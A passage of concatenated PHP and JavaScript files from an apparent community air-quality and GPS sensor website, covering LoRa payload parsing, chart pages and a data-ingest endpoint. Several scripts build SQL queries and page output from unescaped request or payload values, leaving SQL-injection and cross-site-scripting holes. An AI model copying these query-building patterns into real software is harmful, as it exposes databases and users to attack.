var request = window.XMLHttpRequest?new XMLHttpRequest():new ActiveXObject('Microsoft.XMLHTTP');
request.onreadystatechange = function() {
if(request.readyState == 4) {
document.getElementById('frame').style.display = 'block';
document.getElementById('textframe').innerHTML = request.responseText;
}
}
request.open('GET', url, true);
request.send(null);
}
else {
document.getElementById('frame').style.display = 'none';
thisPage = '';
}
menuItems = document.getElementsByTagName('menu');
for(i=0; i<menuItems.length; i++) if (menuItems[i].getAttribute('id')==page) menuItems[i].setAttribute('class', 'menuSelected');
else menuItems[i].setAttribute('class', 'menuDefault');
}
function toggleMenu() {
menu = document.getElementById('menu');
if (menu.style.display == 'block') menu.style.display = 'none';
else menu.style.display = 'block';
}
<file_sep><?php
include('db.php');
if(!is_numeric($_REQUEST['temp'])) {
die("Invalid temp parameter");
}
if(!is_numeric($_REQUEST['hu'])) {
die("Invalid hu parameter");
}
var_dump($_REQUEST);
$sql = 'INSERT INTO measurement1 SET Moment=NOW(), Tagvalue='.$_REQUEST['temp'];
echo $sql;
$result = mysqlquery($sql);
$sql = 'INSERT INTO measurement2 SET Moment=NOW(), Tagvalue='.$_REQUEST['hu'];
//echo $sql;
$result = mysqlquery($sql);
?><file_sep># ApeldoornInData
apeldoornindata.nl
<file_sep><?php
include('db.php');
?>
<script type="text/javascript">
setTimeout(function () { location.reload(true); }, 100);
</script>
<?php
//echo '<pre>';
/*
$sql = 'Truncate lorarawttnmapperlocation';
mysqlquery($sql);
$sql = 'Truncate lorarawttnmappergateway';
mysqlquery($sql);
*/
$sql = 'SELECT * FROM lorarawttnmapper WHERE Processed = 0 ORDER BY moment ASC LIMIT 50';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
echo $row['Id'].'<br/>';
//var_dump($row);
if(isset($row['Data'])) {
$dataObject = json_decode($row['Data']);
if(isset($dataObject->payload_fields)) {
$availableFields = 0;
if(isset($dataObject->payload_fields->latitude)) {
$lat = $dataObject->payload_fields->latitude;
//echo 'Lat: '.$lat.'<br/>'."\n";
$availableFields++;
}
if(isset($dataObject->payload_fields->longitude)) {
$lon = $dataObject->payload_fields->longitude;
//echo 'Lon: '.$lon.'<br/>'."\n";
$availableFields++;
}
if(isset($dataObject->payload_fields->altitude)) {
$alt = $dataObject->payload_fields->altitude;
//echo 'Alt: '.$alt.'<br/>'."\n";
$availableFields++;
}
if(isset($dataObject->payload_fields->hdop)) {
$hdop = $dataObject->payload_fields->hdop;
//echo 'Hdop: '.$hdop.'<br/>'."\n";
}
if(isset($dataObject->metadata->time)) {
$time = $dataObject->metadata->time;
//echo 'Time: '.$time.'<br/>'."\n";
$availableFields++;
}
if(isset($dataObject->metadata->gateways)) {
$gateways = $dataObject->metadata->gateways;
usort($gateways, function($a, $b) { //Sort the array using a user defined function
return $a->rssi > $b->rssi ? -1 : 1; //Compare the scores
});
$rssi = $gateways[0]->rssi;
$availableFields++;
}
if($availableFields == 5) {
$sql = 'INSERT INTO lorarawttnmapperlocation SET Moment = \''.$time.'\', Lat = '.$lat.', Lon = '.$lon.', Alt = '.$alt.', Rssi = '.$rssi.', Rawid = '.$row['Id'];
//echo $sql.'<br/>';
mysqlquery($sql);
$insertIdLocation = mysqli_insert_id($GLOBALS['mysqli']);
//echo 'Insert Id: '.$insertIdLocation.'<br/>';
}
if(isset($dataObject->metadata->gateways)) {
$gateways = $dataObject->metadata->gateways;
//var_dump($gateways);
foreach ($gateways as $gateway) {
$sqlGw = 'INSERT INTO lorarawttnmappergateway SET Gwid = \''.$gateway->gtw_id.'\', Lastmessage = \''.$time.'\', Lat = '.$gateway->latitude.', Lon = '.$gateway->longitude.', Alt = '.$gateway->altitude.', Ch'.$gateway->channel.' = Ch'.$gateway->channel.' + 1 ON DUPLICATE KEY UPDATE Lastmessage = \''.$time.'\', Lat = '.$gateway->latitude.', Lon = '.$gateway->longitude.', Alt = '.$gateway->altitude.', Ch'.$gateway->channel.' = Ch'.$gateway->channel.' + 1';
//echo $sql.'<br/>';
mysqlquery($sqlGw);
$sql1 = 'SELECT * FROM lorarawttnmappergateway WHERE Gwid = \''.$gateway->gtw_id.'\'';
//echo $sql1;
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO lorarawttnmapperlocationgwrelation SET Gwid = \''.$row1['Id'].'\', Location = '.$insertIdLocation.'';
//echo $sql2.'<br/>';
mysqlquery($sql2);
}
}
}
}
}
$sql3 = 'UPDATE lorarawttnmapper SET Processed = 1 WHERE Id = '.$row['Id'];
//echo $sql3.'<br/>';
mysqlquery($sql3);
}
?><file_sep><?php
include('db.php');
if($_REQUEST['id'] == null) {
echo 'id niet ingegeven';
exit();
}
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
$limit = '';
if($_REQUEST['limit'] != null) {
$limit = $_REQUEST['limit'];
}
$daysback = 0;
if($_REQUEST['daysback'] != null) {
if(is_numeric($_REQUEST['daysback'])) {
$daysback = addslashes($_REQUEST['daysback']);
}
}
$points = null;
$multipleAxis = false;
$sql = 'SELECT * FROM point WHERE Nodeid = '.addslashes($_REQUEST['id']).' ORDER BY Priority';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$points[] = $row['Name'];
if($row['Name'] == 'Lichtintensiteit'
|| $row['Name'] == 'Luchtdruk'
|| $row['Name'] == 'CO2' ) {
$multipleAxis = true;
}
}
?>
<html style="width: 100%; height: 100%; margin: 0;">
<head>
<!--Load the AJAX API-->
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript">
// Load the Visualization API and the piechart package.
google.charts.load('current', {'packages':['corechart']});
// Set a callback to run when the Google Visualization API is loaded.
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var chart = new google.visualization.LineChart(document.getElementById('chart_div'));
var jsonData = $.ajax({
url: "chartdata.php?id=<?php echo addslashes($_REQUEST['id']) ?>&type=fullnode&limit=<?php echo addslashes($limit).'&daysback='.$daysback; ?>",
dataType: "json",
async: false
}).responseText;
options = {
chartArea : { left: 80, right: 50, top:10, bottom: 20},
legend: {position: 'none'},
interpolateNulls: true,
<?php
if(!$multipleAxis) {
echo 'vAxis: {format:\'#.#\'},'."\n";
} else {
echo 'vAxis: {0: {logScale: false}, 1: {logScale: false, minValue: 0}},'."\n";
$j=0;
echo 'series:{';
foreach($points as $point)
{
if($j != 0) {
echo ', ';
}
echo $j.':{targetAxisIndex:';
if($point == 'Lichtintensiteit'
|| $point == 'Luchtdruk'
|| $point == 'CO2' )
{
echo '1}';
} else {
echo '0}';
}
$j++;
}
echo '},';
}
?>
hAxis: {
format: 'HH:mm:ss',
}
};
data = new google.visualization.DataTable();
data.addColumn('datetime', 'Time');
<?php
foreach((array) $points as $point) {
echo 'data.addColumn(\'number\', \''.$point.'\');'."\n";
}
?>
data.insertRows(0, eval(jsonData));
var date_formatter = new google.visualization.DateFormat({
pattern: "dd/MM/yyyy HH:mm:ss"
});
date_formatter.format(data, 0);
chart.draw(data, options);
}
$(window).resize(function() {
if(this.resizeTO) clearTimeout(this.resizeTO);
this.resizeTO = setTimeout(function() {
$(this).trigger('resizeEnd');
}, 500);
});
//redraw graph when window resize is completed
$(window).on('resizeEnd', function() {
drawChart(data);
});
</script>
</head>
<body style="width: 100%; height: 100%; margin: 0;">
<!--Div that will hold the pie chart-->
<div id="chart_div" style="width: 90%; height: 90%;"></div>
</body>
</html><file_sep><?php
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
?>
<html style="width: 100%; height: 100%; margin: 0;">
<head>
<!--Load the AJAX API-->
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript">
// Load the Visualization API and the piechart package.
google.charts.load('current', {'packages':['corechart']});
// Set a callback to run when the Google Visualization API is loaded.
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var chart = new google.visualization.LineChart(document.getElementById('chart_div'));
var jsonData = $.ajax({
url: "chartdata.php?id=<?php echo addslashes($_REQUEST['id']) ?>&type=firstpriority",
dataType: "json",
async: false
}).responseText;
options = {
chartArea : { left: 40, top:10, bottom: 50, width: 220, heigth: 80},
vAxis: {format:'#.#'},
legend: {position: 'none'},
hAxis: {
format: 'HH:mm:ss',
},
height: 100
};
data = new google.visualization.DataTable();
data.addColumn('datetime', 'Time');
data.addColumn('number', 'Temperatuur');
data.insertRows(0, eval(jsonData));
chart.draw(data, options);
// Create our data table out of JSON data loaded from server.
//var data = new google.visualization.DataTable(jsonData);
// Instantiate and draw our chart, passing in some options.
//chart.draw(data, {width: 400, height: 240});
}
</script>
</head>
<body style="width: 100%; height: 100%; margin: 0;">
<!--Div that will hold the pie chart-->
<div id="chart_div"></div>
</body>
</html><file_sep><?php
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<?php
include('headinclude.php');
?>
<meta http-equiv="refresh" content="60">
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
<link rel="stylesheet" href="https://unpkg.com/leaflet@1.1.0/dist/leaflet.css" integrity="<KEY> crossorigin=""/>
<script src="https://unpkg.com/leaflet@1.1.0/dist/leaflet.js" integrity="<KEY> crossorigin=""></script>
</head>
<body style="padding:0px">
<?php
include('db.php');
echo '<div class="container-fluid">'."\n";
echo '<div class="row">'."\n";
echo '<div class="col-sm-12">'."\n";
echo '<h1>GPS tracker '.addslashes($_REQUEST['id']).'</h1>'."\n";
$sql = 'SELECT *, UNIX_TIMESTAMP(Moment) as unixtime FROM gpslocation'.addslashes($_REQUEST['id']).' ORDER BY Moment DESC Limit 3';
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$locations[] = $row;
//var_dump($row);
}
//var_dump($locations);
echo '<table border="1" style="text-align: right;">'."\n";
echo '<tr><th>Moment</th>';
echo '<th>Latitude</th>';
echo '<th>Logitude</th>';
echo '<th>Hdop</th>';
echo '<th>Speed</th>';
echo '<th>Alt</th>';
echo '<th>Direction</th>';
echo '<th>Connection</th>';
echo '</tr>'."\n";
$i = 1;
if(isset($locations)) {
foreach($locations as $location) {
if($i == 1) {
$lat = $location['Lat'];
$lon = $location['Lon'];
}
echo '<tr>';
if($location['unixtime'] > (time() - 60)) {
echo '<td>'.$location['Moment'].'</td>';
} else {
echo '<td bgcolor="red">'.$location['Moment'].'</td>';
}
echo '<td><a href="https://www.google.nl/maps/place/'.$location['Lat'].'+'.$location['Lon'].'" target="_blanc">'.$location['Lat'].'</a></td>';
echo '<td><a href="https://www.google.nl/maps/place/'.$location['Lat'].'+'.$location['Lon'].'" target="_blanc">'.$location['Lon'].'</a></td>';
echo '<td>';
printf("%.2f", $location['Hdop']);
echo '</td>';
echo '<td>';
printf("%.1f", $location['Speed']);
echo '</td>';
echo '<td>';
printf("%.1f", $location['Alt']);
echo '</td>';
echo '<td>';
printf("%.1f", str_replace('-', '', $location['Direction']));
echo '</td>';
echo '<td>';
$gateways = json_decode($location['Gateway']);
foreach ($gateways as $gateway) {
echo $gateway->gtw_id.' - '.$gateway->channel.' - '.$gateway->rssi.' - '.$gateway->snr ;
echo '<br/>';
}
//echo $location['Gateway'];
echo '</td>';
echo '</tr>'."\n";
$i++;
}
} else {
echo '<tr><td>Geen data</td></tr>'."\n";
}
echo '</table>'."\n";
echo '<div class="col-sm-7"><img src="https://maps.googleapis.com/maps/api/staticmap?center='.$lat.','.$lon.'&zoom=15&size=400x400&markers=color:red%7Clabel:Locatie%7C'.$lat.','.$lon.'&key=<KEY>"/></div>'."\n";
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
<script type="text/javascript" src="https://www.ikbennuhier.nl/js/default.js"></script>
</body>
</html><file_sep><?php
function getTabsArrayHealtyHome($payloadraw) {
var_dump($payloadraw);
$payload = bin2hex(base64_decode($payloadraw));
var_dump($payload);
$arrPayload = hexToBytes($payload);
var_dump($arrPayload);
$returnArray = array();
for($i=0; $i < count($arrPayload); $i++) {
switch($i) {
case 1: // battery
$accuremaining = hexdec(substr($arrPayload[$i], 0, 1));
$returnArray['accuremaining'] = ($accuremaining / 15) * 100;
$accuvoltage = hexdec(substr($arrPayload[$i], 1, 1));
$returnArray['accuvoltage'] = ($accuvoltage + 25) /10;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 2: // Temperature
$temp = hexdec($arrPayload[$i]);
$returnArray['temperature'] = $temp - 32;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 3: // RH
$rh = hexdec($arrPayload[$i]);
$returnArray['humidity'] = $rh;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 4: // CO2
$co2 = hexdec($arrPayload[$i]) * 256 + hexdec($arrPayload[$i] + 1);
$returnArray['co2'] = $co2;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 6: // VOC
$voc = hexdec($arrPayload[$i]) * 256 + hexdec($arrPayload[$i] + 1);
$returnArray['voc'] = $voc;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
}
}
return $returnArray;
}
function getTabsArrayPir($payloadraw) {
var_dump($payloadraw);
$payload = bin2hex(base64_decode($payloadraw));
var_dump($payload);
$arrPayload = hexToBytes($payload);
var_dump($arrPayload);
$returnArray = array();
for($i=0; $i < count($arrPayload); $i++) {
switch($i) {
case 0: // status
$occupied = hexdec($arrPayload[$i]);
$returnArray['occupied'] = $occupied;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 1: // battery
$accuremaining = hexdec(substr($arrPayload[$i], 0, 1));
$returnArray['accuremaining'] = ($accuremaining / 15) * 100;
$accuvoltage = hexdec(substr($arrPayload[$i], 1, 1));
$returnArray['accuvoltage'] = ($accuvoltage + 25) /10;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 2: // Temperature
$temp = hexdec($arrPayload[$i]);
$returnArray['temperature'] = $temp - 32;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 3: // time
$time = hexdec($arrPayload[$i]) * 256 + hexdec($arrPayload[$i] + 1);
$returnArray['time'] = $time;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
case 5: // Total motion count
$motioncount = hexdec($arrPayload[$i]) * 256 * 256 + hexdec($arrPayload[$i] + 1) * 256 + hexdec($arrPayload[$i] + 2);
$returnArray['motioncount'] = $motioncount;
//echo 'Temp '.$returnArray['temperature'].'<br/>';
break;
}
}
return $returnArray;
}
if(!function_exists('hexToBytes')){
function hexToBytes($hex) {
$bytes = array();
echo 'Payload lenght: '.strlen($hex).'<br/>';
for ($c = 0; $c < strlen($hex); $c += 2) {
array_push($bytes, substr($hex, $c, 2));
}
return $bytes;
}
}
?><file_sep><?php
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
$limit = 1000;
if(isset($_REQUEST['limit'])) {
if(is_numeric($_REQUEST['limit'])) {
if($_REQUEST['limit'] < 50000) {
$limit = addslashes($_REQUEST['limit']);
}
}
}
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<?php
include('headinclude.php');
?>
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
<link rel="stylesheet" href="https://unpkg.com/leaflet@1.1.0/dist/leaflet.css" integrity="<KEY> crossorigin=""/>
<script src="https://unpkg.com/leaflet@1.1.0/dist/leaflet.js" integrity="<KEY> crossorigin=""></script>
</head>
<body>
<?php
include('db.php');
include('menu.php');
echo '<div class="container-fluid">'."\n";
echo '<h1>Locations GPS tracker '.addslashes($_REQUEST['id']).'</h1>'."\n";
echo '<div class="row">'."\n";
echo '<div class="col-sm-5">'."\n";
$sql = 'SELECT * FROM gpslocation'.addslashes($_REQUEST['id']).' ORDER BY Moment DESC Limit '.$limit;
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$locations[] = $row;
//var_dump($row);
}
//var_dump($locations);
echo '<table border="1" style="text-align: right;">'."\n";
echo '<tr><th>Moment</th>';
echo '<th>Latitude</th>';
echo '<th>Logitude</th>';
echo '<th>Hdop</th>';
echo '<th>Speed</th>';
echo '<th>Alt</th>';
echo '<th>Direction</th>';
echo '<th>Connection</th>';
echo '</tr>'."\n";
if(isset($locations)) {
foreach($locations as $location) {
echo '<tr>';
echo '<td>'.$location['Moment'].'</td>';
echo '<td><a href="https://www.google.nl/maps/place/'.$location['Lat'].'+'.$location['Lon'].'" target="_blanc">'.$location['Lat'].'</a></td>';
echo '<td><a href="https://www.google.nl/maps/place/'.$location['Lat'].'+'.$location['Lon'].'" target="_blanc">'.$location['Lon'].'</a></td>';
echo '<td>';
printf("%.2f", $location['Hdop']);
echo '</td>';
echo '<td>';
printf("%.1f", $location['Speed']);
echo '</td>';
echo '<td>';
printf("%.1f", $location['Alt']);
echo '</td>';
echo '<td>';
printf("%.1f", str_replace('-', '', $location['Direction']));
echo '</td>';
echo '<td>';
$sql1 = 'SELECT * FROM gpsgateway LEFT JOIN gateway ON gpsgateway.Gwid = gateway.Gateway WHERE gpsgateway.Gpslocationid = '.$location['Id'];
//echo $sql1;
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
echo 'GW: '.$row1['Gwid'].' ('.$row1['Name'].') - SNR: ';
printf("%.1f", str_replace('-', '', $row1['Snr']));
echo ' - RSSI: '.$row1['Rssi']."\n";
}
echo '</td>';
echo '</tr>'."\n";
}
} else {
echo '<tr><td>Geen data</td></tr>'."\n";
}
echo '</table>'."\n";
echo '</div>'."\n";
echo '<div class="col-sm-7"><div id="mapid" style="width: 1200px; height: 800px;"></div>'."\n";
echo '</div>'."\n";
echo '</div>'."\n";
$locations = array_reverse($locations);
?>
<script>
var mymap = L.map('mapid').setView([<?php
if(isset($locations)) {
echo array_reverse($locations)[0]['Lat'].', '.array_reverse($locations)[0]['Lon'];
}
?>
], 13);
L.tileLayer('https://api.tiles.mapbox.com/v4/{id}/{z}/{x}/{y}.png?access_token=<KEY>', {
maxZoom: 18,
attribution: 'Map data © <a href="http://openstreetmap.org">OpenStreetMap</a> contributors, ' +
'<a href="http://creativecommons.org/licenses/by-sa/2.0/">CC-BY-SA</a>, ' +
'Imagery © <a href="http://mapbox.com">Mapbox</a>',
id: 'mapbox.streets'
}).addTo(mymap);
<?php
if(isset($locations)) {
foreach($locations as $location) {
echo 'L.marker(['.$location['Lat'].', '.$location['Lon'].']).addTo(mymap).bindPopup("<b>'.$location['Moment'].'</b><br />Snelheid: ';
printf("%.1f", $location['Speed']);
echo ' km/h<br/>Richting: ';
printf("%.1f", $location['Direction']);
echo '°<br/>Hdop: ';
printf("%.2f", $location['Hdop']);
echo '<br/>Hoogte: ';
printf("%.1f", $location['Alt']);
echo ' m").openPopup();'."\n";
}
}
?>
</script>
<?php
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
<script type="text/javascript" src="https://www.ikbennuhier.nl/js/default.js"></script>
</body>
</html><file_sep><?php
include('db.php');
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
if(!isset($_REQUEST['code'])) {
die("Invalid code parameter");
}
if(!is_numeric($_REQUEST['code'])) {
die("Invalid code parameter");
}
if(!isset($_REQUEST['location'])) {
die("Invalid Location parameter");
}
if(!strpos($_REQUEST['location'], ',') !== false) {
die("location parameter has no ,");
}
if(strlen($_REQUEST['location']) < 3) {
die("location parameter is to short");
}
function insertIntoInflux($nodeName, $insertData) {
//logerror('Insert into Influx: '.$nodeName.' '.$insertData);
$ch = curl_init('http://localhost:8086/write?db=aid');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_USERPWD, '<PASSWORD>');
curl_setopt($ch, CURLOPT_POSTFIELDS, $nodeName.' '.$insertData);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
}
$nodeName = '';
$influxData = '';
$sendToLuftDaten = false;
$luftdatenSensorName = '';
$sendToRIVM = false;
logerror('Start SendData: '.$_REQUEST['id'].' - '.json_encode($_REQUEST));
$sql = 'SELECT * FROM node WHERE Id = '.addslashes($_REQUEST['id']).' AND Hwserial = '.addslashes($_REQUEST['code']);
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$nodeName = strtolower(str_replace('-', '', preg_replace('/\s+/', '', $row['Name'])));
//echo $_REQUEST['location'].'<br/>';
$locationarr = explode(',', $_REQUEST['location']);
$lat = $locationarr[0];
$lon = $locationarr[1];
//echo 'Lat: '.$lat.'<br/>';
//echo 'Lon: '.$lon.'<br/>';
$dateNow = date('Y-m-d H:i:s');
if($row['Id'] == 19) {
$sql = 'UPDATE node SET Lastmessage=NOW(), Packets = Packets + 1, Lastlocationlat = \'52.18430\', Lastlocationlon = \'5.94394\' WHERE Id='.$row['Id'];
//echo $sql;
$result = mysqlquery($sql);
} elseif($row['Id'] == 75) {
$sql = 'UPDATE node SET Lastmessage=NOW(), Packets = Packets + 1, Lastlocationlat = \'52.03057\', Lastlocationlon = \'5.57186\' WHERE Id='.$row['Id'];
//echo $sql;
$result = mysqlquery($sql);
} else {
$sql = 'UPDATE node SET Lastmessage=NOW(), Packets = Packets + 1';
if($lat != 0 && $lat != 0) {
$sql .= ', Lastlocationlat = '.addslashes($lat).', Lastlocationlon = '.addslashes($lon);
}
$sql .= ' WHERE Id='.$row['Id'];
//echo $sql;
$result = mysqlquery($sql);
}
if(array_key_exists('pm10', $_REQUEST)) {
echo 'PM10 '.htmlspecialchars(addslashes($_REQUEST['pm10'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Fijnstof - PM10\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['pm10']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
$pm10 = $_REQUEST['pm10'];
}
if($influxData != '') $influxData .= ',';
$influxData .= 'pm10='.floatval($_REQUEST['pm10']);
}
if(array_key_exists('pm25', $_REQUEST)) {
echo 'PM2.5 '.htmlspecialchars(addslashes($_REQUEST['pm25'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Fijnstof - PM2.5\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['pm25']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
$pm25 = $_REQUEST['pm25'];
}
if($influxData != '') $influxData .= ',';
$influxData .= 'pm25='.floatval($_REQUEST['pm25']);
}
if(array_key_exists('co2', $_REQUEST)) {
echo 'CO2 '.htmlspecialchars(addslashes($_REQUEST['co2'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'CO2\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['co2']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'co2='.floatval($_REQUEST['co2']);
}
if(array_key_exists('temp', $_REQUEST)) {
echo 'Temperatuur '.htmlspecialchars(addslashes($_REQUEST['temp'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Temperatuur\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['temp']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'temperatuur='.floatval($_REQUEST['temp']);
}
if(array_key_exists('rh', $_REQUEST)) {
echo 'Relatieve vochtigheid '.htmlspecialchars(addslashes($_REQUEST['rh'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Relative vochtigheid\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['rh']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'vochtigheid='.floatval($_REQUEST['rh']);
}
if(array_key_exists('luchtdruk', $_REQUEST)) {
echo 'Luchtdruk '.htmlspecialchars(addslashes($_REQUEST['luchtdruk'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Luchtdruk\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['luchtdruk']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'luchtdruk='.floatval($_REQUEST['luchtdruk']);
}
if(array_key_exists('accu', $_REQUEST)) {
echo 'Accu '.htmlspecialchars(addslashes($_REQUEST['accu'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Batterij\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['accu']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'accu='.floatval($_REQUEST['accu']);
}
if(array_key_exists('di', $_REQUEST)) {
echo 'Digitaal in '.htmlspecialchars(addslashes($_REQUEST['di'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'<NAME>\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['di']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'di='.floatval($_REQUEST['di']);
}
if(array_key_exists('lux', $_REQUEST)) {
echo 'Lichtintensiteit '.htmlspecialchars(addslashes($_REQUEST['lux'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Lichtintensiteit\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['lux']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'lux='.floatval($_REQUEST['lux']);
}
if(array_key_exists('radio', $_REQUEST)) {
echo 'Radioactieve straling '.htmlspecialchars(addslashes($_REQUEST['radio'])).'<br/>';
$sql1 = 'SELECT * FROM point WHERE Nodeid = '.$row['Id'].' AND Name = \'Radio actieve straling\'';
//echo $sql1.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'INSERT INTO measurement'.$row1['Id'].' SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($_REQUEST['radio']);
//echo $sql2.'<br/>';
$result2 = mysqlquery($sql2);
}
if($influxData != '') $influxData .= ',';
$influxData .= 'radioactievestraling='.floatval($_REQUEST['radio']);
}
echo 'ok<br/>';
if($_REQUEST['id'] == 19) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'IndustrialItSDS011PM10 lat=52.184293,lon=5.943888';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-industrialit';
}
}
if($_REQUEST['id'] == 62) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'Flint lat=52.18295,lon=5.92980';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-flint';
}
}
if($_REQUEST['id'] == 64) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'IndustrialItBWestendorpstraat lat=52.20381,lon=5.94034';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-industrialit2';
}
}
if($_REQUEST['id'] == 65) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'GertUgchelen lat=52.18603,lon=5.94865';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-gert';
}
}
if($_REQUEST['id'] == 68) {
if(isset($pm10) && isset($pm25)){
$sendToRIVM = true;
$rivmSensorName = 'ArnoldK lat=52.22731,lon=5.98961';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-arnold';
}
}
